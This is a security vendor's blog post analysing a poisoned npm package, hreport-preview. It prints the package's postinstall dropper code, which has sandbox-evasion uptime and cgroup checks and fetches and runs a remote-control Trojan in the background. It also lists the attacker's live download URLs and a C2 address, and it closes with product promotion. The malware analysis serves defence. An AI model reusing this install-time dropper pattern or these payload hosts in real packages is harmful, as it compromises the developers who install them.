Meeting the red team boss mid-lane: the poisoner behind the offensive and defensive drills

Background

On the evening of August 14, 2023, Murphy Security Lab published "The First Open Source Component Poisoning Attack Against a Domestic Financial Enterprise", an analysis of an NPM poisoning incident. On August 17 we then detected a new poisoned npm package, hreport-preview. The domain the package uses to download its Trojan is img.murphysec-nb.love (see Figure 1 below); it was registered on August 14, and the registrant used a throwaway Hotmail address. Clearly the attacker we exposed last time has rushed straight back to the middle lane to line up against us. Brother, do you have to be this fast -_-!

Figure 1: whois lookup

At noon that day we also received an email from Louis, CTO of phylum.io, a software supply chain security start-up in Colorado, USA, on the other side of the ocean, who had also noticed the incident (see Figure 2) and asked whether the poisoned package was our doing. How embarrassing.

Figure 2: A letter from phylum asking about the poisoning package

Poisoning incident analysis

At 7 a.m. on August 17, Murphy Security Lab detected that the user rowebrighttix (email: [email protected]) had uploaded the package hreport-preview, which carries a remote-control Trojan, to NPM (see Figure 3).

Figure 3: The hreport-preview package in the NPM repository

The README is titled "Integrate common functions", and the function names listed under it come from a Chinese article (see Figure 4), so the poisoner very likely has a Chinese background.

Figure 4: The function names mentioned in the article "56 JavaScript utility functions to help you improve development efficiency!"

Code analysis

When a user installs the package, the postinstall script "node index.js" declared in package.json is executed. It then downloads the malicious Trojan for Windows, macOS or Linux from one of the following URLs. The Trojan connects back to the poisoner's C2 server (e.g. 152.195.38.76) to establish a remote session, after which it can execute commands, upload/download files and so on; it is suspected to be red team tooling for offensive and defensive drills:

  • https://img.murphysec-nb.love/w_x32.exe

  • https://img.murphysec-nb.love/m_arm

  • https://img.murphysec-nb.love/l_x64


//index.js  downloads the malicious Trojan
//...... (getip, checkCgroup, uptimeMinutes, downloadAndSaveFile,
//        addExecutablePermission and runInBackground are defined in the
//        part of index.js omitted here)

function check(){
    (async () => {
        // Only proceeds if the IP lookup succeeds, i.e. the host is online
        const result = await getip();
        if (result){
            let status = false;
            let donwoload = ""   // (sic) URL of the platform-specific payload
            const platform = os.platform();
            const arch = os.arch();

            if (platform === 'win32') {
                // Windows: only act if the host has been up for more than 10 minutes,
                // a crude check that skips freshly booted analysis sandboxes
                if (uptimeMinutes.toFixed(2) > 10){
                    donwoload="https://img.murphysec-nb.love/"+"w_"+arch+".exe"
                    status = true
                }

            } else if (platform === 'darwin') {
                // macOS: same uptime condition
                if (uptimeMinutes.toFixed(2) > 10){
                    donwoload="https://img.murphysec-nb.love/"+"m_"+arch
                    status = true
                }
            } else if (platform === 'linux') {
                // Linux: act immediately when checkCgroup() returns true,
                // otherwise fall back to the same uptime condition
                donwoload="https://img.murphysec-nb.love/"+"l_"+arch
                await (async () => {
                    const result = await checkCgroup();
                    if (result) {
                        status = true
                    } else {
                        if (uptimeMinutes.toFixed(2) > 10){
                            status = true
                        }
                    }
                })();
            } else {
                // Any other platform: do nothing
                return

            }

            if(status) {
                // Fetch the payload, mark it executable on Unix-like systems
                // and launch it detached from the install process
                await (async () => {
                    const result = await downloadAndSaveFile(donwoload);
                    if (result !=null){
                        if (platform === 'linux' ||platform === 'darwin' ){
                            addExecutablePermission(result)
                        }
                        runInBackground(result)

                    }

                })();
            }else {
                process.exit(0);
            }
        }
    })();

}

IOC

Detection tools and poisoning intelligence

Murphy Security offers a product that blocks poisoning of open source components in real time

Murphy Security's private registry gateway detects and intercepts poisoning events in central registries such as npm, pip and Maven in real time, and supports baseline management of high-risk vulnerabilities. It has been deployed at dozens of customers, including China Mobile.

Murphy Security offers real-time open source component poisoning intelligence alerts, available by subscription

Murphy Security's 0-day vulnerability and poisoning intelligence covers the latest 0-day, 1-day and poisoning alerts. Every item is researched and assessed by security experts, so enterprises receive first-hand, high-quality vulnerability and poisoning intelligence that goes beyond CVE: the vulnerability database carries more than 25 additional detailed analysis fields. The product is currently in use at dozens of customers, including Ant, Meituan and China Telecom.

Enterprises interested in the above features can apply for a trial in either of the following ways:

1. Long press the QR code to apply:


2. Visit the application link:

https://murphysec.feishu.cn/share/base/form/shrcny75AEBuEJpL8myuAKPfsPe

Origin blog.csdn.net/murphysec/article/details/132358742